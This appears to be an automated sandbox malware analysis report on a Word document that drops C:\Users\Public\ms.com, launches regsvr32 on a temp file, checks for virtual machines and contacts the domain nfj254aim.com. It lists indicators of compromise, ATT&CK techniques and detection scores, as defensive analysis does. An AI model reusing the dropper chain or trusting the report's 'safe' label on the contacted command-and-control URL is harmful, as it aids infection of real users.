Drops PE files with a suspicious file extension

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\Public\ms.com

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\Public\ms.com

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\Public\ms.com

Jump to dropped file

Boot Survival:

Drops PE files to the user root directory

Show sources

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE

File created: C:\Users\Public\ms.com

Jump to dropped file

Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\ms.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\ms.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\ms.com	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Users\Public\ms.com	Memory allocated: 4F10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\ms.com	Memory allocated: 63F0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\ms.com	Memory allocated: 6570000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\ms.com	Memory allocated: 65B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\ms.com	Memory allocated: 6730000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\ms.com	Memory allocated: 6B50000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\ms.com	Memory allocated: 6BB0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\ms.com	Memory allocated: 6BD0000 memory commit \| memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\Public\ms.com	Memory allocated: 6BF0000 memory commit \| memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\Public\ms.com

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Jump to behavior

Source: ms.com, 00000001.00000002.229166910.0000000006E10000.00000002.00000001.sdmp	Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: ms.com, 00000001.00000003.222604745.0000000006A46000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: ms.com, 00000001.00000002.229166910.0000000006E10000.00000002.00000001.sdmp	Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: ms.com, 00000001.00000002.229166910.0000000006E10000.00000002.00000001.sdmp	Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: ms.com, 00000001.00000002.229166910.0000000006E10000.00000002.00000001.sdmp	Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.

Source: C:\Users\Public\ms.com

1_2_00B31460

Source: C:\Users\Public\ms.com

Code function: 1_2_00B31F11 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

1_2_00B31F11

Source: C:\Users\Public\ms.com

Process created: C:\Windows\SysWOW64\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' C:\Users\user\AppData\Local\Temp\temp.tmp

Jump to behavior

Source: C:\Users\Public\ms.com

Code function: 1_2_00B31DC3 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,

1_2_00B31DC3

Source: C:\Users\Public\ms.com

1_2_00B31460

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation11	DLL Side-Loading1	Process Injection11	Masquerading211	OS Credential Dumping	System Time Discovery1	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Command and Scripting Interpreter2	Boot or Logon Initialization Scripts	DLL Side-Loading1	Virtualization/Sandbox Evasion2	LSASS Memory	Security Software Discovery11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Non-Application Layer Protocol2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Scripting2	Logon Script (Windows)	Logon Script (Windows)	Process Injection11	Security Account Manager	Virtualization/Sandbox Evasion2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Application Layer Protocol12	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Native API1	Logon Script (Mac)	Logon Script (Mac)	Scripting2	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Exploitation for Client Execution13	Network Logon Script	Network Logon Script	Obfuscated Files or Information1	LSA Secrets	File and Directory Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	System Information Discovery6	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
documenti 12.01.20.doc	29%	Virustotal		Browse
documenti 12.01.20.doc	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\Public\ms.com	0%	Metadefender		Browse
C:\Users\Public\ms.com	0%	ReversingLabs

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://cdn.entity.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://wus2-000.contentsync.	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://powerlift.acompli.net	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://rpsticket.partnerservices.getmicrosoftkey.com	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://cortana.ai	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://api.aadrm.com/	0%	URL Reputation	safe
https://ofcrecsvcapi-int.azurewebsites.net/	0%	Avira URL Cloud	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://res.getmicrosoftkey.com/api/redemptionevents	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://powerlift-frontdesk.acompli.net	0%	URL Reputation	safe
https://officeci.azurewebsites.net/api/	0%	Avira URL Cloud	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://store.office.cn/addinstemplate	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://wus2-000.pagecontentsync.	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://store.officeppe.com/addinstemplate	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://dev0-api.acompli.net/autodetect	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
https://www.odwebp.svc.ms	0%	URL Reputation	safe
http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz	0%	Avira URL Cloud	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://dataservice.o365filtering.com/	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://officesetup.getmicrosoftkey.com	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://prod-global-autodetect.acompli.net/autodetect	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://apis.live.net/v5.0/	0%	URL Reputation	safe
https://asgsmsproxyapi.azurewebsites.net/	0%	Avira URL Cloud	safe
http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rw	0%	Avira URL Cloud	safe
https://ncus-000.contentsync.	0%	URL Reputation	safe
https://ncus-000.contentsync.	0%	URL Reputation	safe
https://ncus-000.contentsync.	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://skyapi.live.net/Activity/	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://dataservice.o365filtering.com	0%	URL Reputation	safe
https://ovisualuiapp.azurewebsites.net/pbiagave/	0%	Avira URL Cloud	safe
https://directory.services.	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe
https://directory.services.	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
nfj254aim.com	104.28.6.227	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://nfj254aim.com/analytics/0D5FgQlJcMskzpbtgQBE7OE_tLI3/BUu5qgsI6FW8bkEsrF2HLHJUIr/lRD_7cnWmi/rwwHf1xOO/7n6dDzF/xspcd2?RltAN=vsETwS&G_=Ro_LgyQulrPjxaAj&wixw=XYJCRUJhgYHPY&bkUOD=AXjbvUQDbTcWkz	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.diagnosticssdf.office.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://login.microsoftonline.com/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://shell.suite.office.com:1443	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://cdn.entity.	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.addins.omex.office.net/appinfo/query	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://wus2-000.contentsync.	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://clients.config.office.net/user/v1.0/tenantassociationkey	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://powerlift.acompli.net	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://cortana.ai	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://cloudfiles.onenote.com/upload.aspx	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://entitlement.diagnosticssdf.office.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://api.aadrm.com/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	Avira URL Cloud: safe	unknown
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://api.microsoftstream.com/api/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://cr.office.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://portal.office.com/account/?ref=ClientMeControl	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://ecs.office.com/config/v2/Office	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://graph.ppe.windows.net	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://officeci.azurewebsites.net/api/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://store.office.cn/addinstemplate	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://wus2-000.pagecontentsync.	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office.com/autosuggest/api/v1/init?cvid=	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://globaldisco.crm.dynamics.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://store.officeppe.com/addinstemplate	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev0-api.acompli.net/autodetect	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.odwebp.svc.ms	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://web.microsoftstream.com/video/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://graph.windows.net	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://dataservice.o365filtering.com/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officesetup.getmicrosoftkey.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
http://weather.service.msn.com/data.aspx	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://apis.live.net/v5.0/	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
https://management.azure.com	03A112E3-5A1A-4EB6-A30A-4E5816B016CD.0.dr	false		high
